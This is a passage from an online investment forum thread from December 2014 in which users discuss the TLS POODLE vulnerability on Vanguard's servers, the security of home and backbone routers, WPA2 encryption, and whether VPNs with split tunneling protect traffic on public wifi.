- NIST 800-153 - Guidelines for Securing Wireless Local Area Networks (WLANs) - http://csrc.nist.gov/publications/nistp ... 00-153.pdf
- NIST 800-95 - Guide to Secure Web Services - http://csrc.nist.gov/publications/nistp ... 800-95.pdf

Is that really helping someone protect themselves from Poodle TLs? No.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Fri Dec 12, 2014 1:54 am

killjoy2012 wrote:
cb474 wrote:Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks
cb474 wrote:I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing.
So, which is it? It's the same "IT guys" building and operating these devices. And if you think Cisco/Juniper commercial routers are somehow these super secure devices that rarely have any vulnerabilities or default passwords/configs - go spend some time on Shodan.
There is no "which is it?". It is both. There are excellent IT professionals when it comes to security, mediocre IT professionals when it comes to security, and everything in between. Saying all IT workers have the same level of security skills is like saying a doctor currently in family practice could perform the same sort of surgery as a world-class cardiologist simply because they are both in the medical field.

Just as there are different skill levels and areas of expertise within IT workers, there are different levels of hardware/firmware classified as "routers". There is a distinct difference between a core router and an edge router in the IP subnet, just as there is a distinct difference between a home router and a small corporate router. They're all routers, but they are not all made equal. So saying you found a vulnerable Cisco router on a banner-collecting website like Shodan doesn't really say much at all unless you refine that to at least a level of intended service.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: Vanguard site Very Vulnerable to ‘Poodle’ Bug

Post by Mudpuppy » Fri Dec 12, 2014 1:55 am

This is already being discussed over on viewtopic.php?f=10&t=152577&p=2291320#p2287237

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Fri Dec 12, 2014 4:46 am

Mudpuppy wrote:
killjoy2012 wrote:
cb474 wrote:Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks
cb474 wrote:I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing.
So, which is it? It's the same "IT guys" building and operating these devices. And if you think Cisco/Juniper commercial routers are somehow these super secure devices that rarely have any vulnerabilities or default passwords/configs - go spend some time on Shodan.
There is no "which is it?". It is both. There are excellent IT professionals when it comes to security, mediocre IT professionals when it comes to security, and everything in between. Saying all IT workers have the same level of security skills is like saying a doctor currently in family practice could perform the same sort of surgery as a world-class cardiologist simply because they are both in the medical field.

Just as there are different skill levels and areas of expertise within IT workers, there are different levels of hardware/firmware classified as "routers". There is a distinct difference between a core router and an edge router in the IP subnet, just as there is a distinct difference between a home router and a small corporate router. They're all routers, but they are not all made equal. So saying you found a vulnerable Cisco router on a banner-collecting website like Shodan doesn't really say much at all unless you refine that to at least a level of intended service.
You beat me to the punch, Mudpuppy. There is a huge difference between the people designing routers for Cisco, etc., and the people installing special firmware on hotel or other public wifi routers just to track your usage for their marketing purposes. And the people who are responsible for routers in the backbone of the internet are also far more sophistiated and talented, than say the IT guy at your office. And so on. I did not in any way suggest they are all the same and in fact was making the point that Mudpuppy makes, if you read my above post carefully.

Unforunately, we are also discovering that not all financial institutions are as on the ball as others. Vanguard and Fidelity are lagging on their response to the TLS 1.2 Poodle bug. Schwab and several other banks I checked weren't vulnerable as soon as it was announced. This is not the first time I've been disappointed in Vanguard's website security. They do seem to lag the leaders in the financial services industry.

Anyway, I don't see the point of this debate over home routers. If killjoy2012 does not think the TLS 1.2 Poodle bug is a worthy occasion to mention ensuring one's home wifi uses WPA2 encryption, good luck to those who take this advice and don't check the security of their home routers. To all others, I strongly encourage you to ignore this advice and make sure your home router uses WPA2 encryption. This is not some big deal complicated thing, so not taking the couple minutes necessary to set it up is foolhardy, I think. If you don't believe me, just do a search on WEP vs WPA2 encryption and see if you can find anyone out there recommending the difference doesn't matter, because someone is unlikely to target your home router directly.

User avatar
max12377
Posts: 149
Joined: Tue Jul 15, 2008 4:02 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by max12377 » Fri Dec 12, 2014 5:10 am

Meh, the bug is called Poodle.. If it were called DeathRay or Incinerator I might be concerned but what's to fear from a Poodle ?

:beer

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Fri Dec 12, 2014 5:18 am

FYI, all servers at investor.vanguard.com and vanguard.com appear to be updated for the bug now.

ThankYouJack
Posts: 3088
Joined: Wed Oct 08, 2014 7:27 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by ThankYouJack » Fri Dec 12, 2014 8:51 am

cb474 wrote:
ThankYouJack wrote:
cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) .
Even if you use a VPN that doesn't mean that data from your computer to vanguard.com will go through the VPN. It depends on the configuration of the VPN, right?
If you've configured the VPN correctly all data on your computer should go through an encrypted tunnel to the VPN, before heading to Vanguard's servers. So it's not that the veritable man in the middle would not see your traffic, it's just that it would be encrypted and unreadable for them.
I think all of your other advice is great, except the statement that a VPN will encrypt all data could be misleading. My organization uses split tunneling so only traffic to the servers in the organization is encrypted through the VPN. After reading the OP, it could make me believe that I was fine going to a Poodle vulnerable website in a hotel or cafe as long as I was connected to the VPN. However, I would be just as vulnerable if I wasn't connected to the VPN.

User avatar
packet
Posts: 833
Joined: Sun Nov 23, 2014 11:23 am
Location: The pub

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by packet » Fri Dec 12, 2014 9:32 am

Yet another good reason ... Don't Peek!

viewtopic.php?f=10&t=152768&newpost=2290161

Cheers,
Packet
sniffsniff... :beer
First round’s on me.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Fri Dec 12, 2014 2:14 pm

cb474 wrote:FYI, all servers at investor.vanguard.com and vanguard.com appear to be updated for the bug now.
That's actually quicker than I expected. The level of bureaucratic red-tape one has to handle before doing server patches in a corporate environment, much less a financial institution which has regulations to consider, can be daunting and time consuming. Back in the "ancient" past, I had a friend who was working as a system administrator for a large, multinational bank. I recall picking him up from work to hang out for the evening and seeing the massive stack of paperwork on his desk that he had to fill out related to the Y2K patches he was applying to the servers.

User avatar
LadyGeek
Site Admin
Posts: 58750
Joined: Sat Dec 20, 2008 5:34 pm
Location: Philadelphia
Contact:

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by LadyGeek » Fri Dec 12, 2014 3:28 pm

FYI - I moved geekpryde's thread into here.
Wiki To some, the glass is half full. To others, the glass is half empty. To an engineer, it's twice the size it needs to be.

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Fri Dec 12, 2014 8:03 pm

ThankYouJack wrote:I think all of your other advice is great, except the statement that a VPN will encrypt all data could be misleading. My organization uses split tunneling so only traffic to the servers in the organization is encrypted through the VPN. After reading the OP, it could make me believe that I was fine going to a Poodle vulnerable website in a hotel or cafe as long as I was connected to the VPN. However, I would be just as vulnerable if I wasn't connected to the VPN.
I believe you that this is how your organizations VPN work. Maybe that's more common with VPN's for workplaces? But I've never seen a third party VPN service that is not designed to set up an encrypted tunnel for all traffic. This is the whole point of these services. Of course, how well they work and what happens when they fail or disconnect can be done better or worse, as I discuss above. But I do think the usual point of a VPN is to create an encrypted tunnel for all traffic.

Also strickly speaking, it does sound like your organizations VPN works in the way I described. It creates an encrypted tunnel to the organizations server. That's it's purpose. To create a private, secure connection for all interaction with the organization. But other traffic, when you read the news, etc., is your own traffic and so not encrypted. This is different from a VPN service who's sole purpose is not to connect you to their server as your end destination to work with that server, but whose purpose is to pass all your traffic through their server to make it secure and private--i.e. their server is a middle point between all traffic and your end destinations, not the destination itself.

I guess people should not assume that if they have a VPN connection to their workplace, that means all their internet traffic is encrypted and secure to anywhere on the internet. That would be a potentially mistaken assumption. Although I would not have made that assumption if it was my work VPN. Work VPNs are different from privacy service VPNs. But clearly there's room for confusion, as you point out.
Mudpuppy wrote:
cb474 wrote:FYI, all servers at investor.vanguard.com and vanguard.com appear to be updated for the bug now.
That's actually quicker than I expected. The level of bureaucratic red-tape one has to handle before doing server patches in a corporate environment, much less a financial institution which has regulations to consider, can be daunting and time consuming. Back in the "ancient" past, I had a friend who was working as a system administrator for a large, multinational bank. I recall picking him up from work to hang out for the evening and seeing the massive stack of paperwork on his desk that he had to fill out related to the Y2K patches he was applying to the servers.
It is also quicker than I thought it was going to be and I'm happy that they reacted so quickly.

On the other hand, when the bug was first announced I found that most financial institutions (my bank, other banks, other investment companies) were already not vulnerable to the bug--although some others were, as pointed out in this thread. So either financial institutions and other vulnerable industries had a heads up before the bug was publically announced, which is often the case, and hence what we really saw was that Vanguard failed to head the advanced warning and deal with the bug before it became public knowledge (and therefore more of a target). Or what we saw was that Vanguard was not doing something that other companies were doing that simply intrinsically made TLS 1.2 alread not vulnerable to the bug. So to me Vanguard's response was good, but still lagging the best in (if not the majority of) the industry.

And even though they have now fixed, I'm still astonished that vanguard.com remained vulnerable until now to the original SSLv3 poodle bug from months ago. That's just negligent.

To me it fits a long running pattern with Vanguard not being as good at server security as they should be and lagging behind the best companies.

Post Reply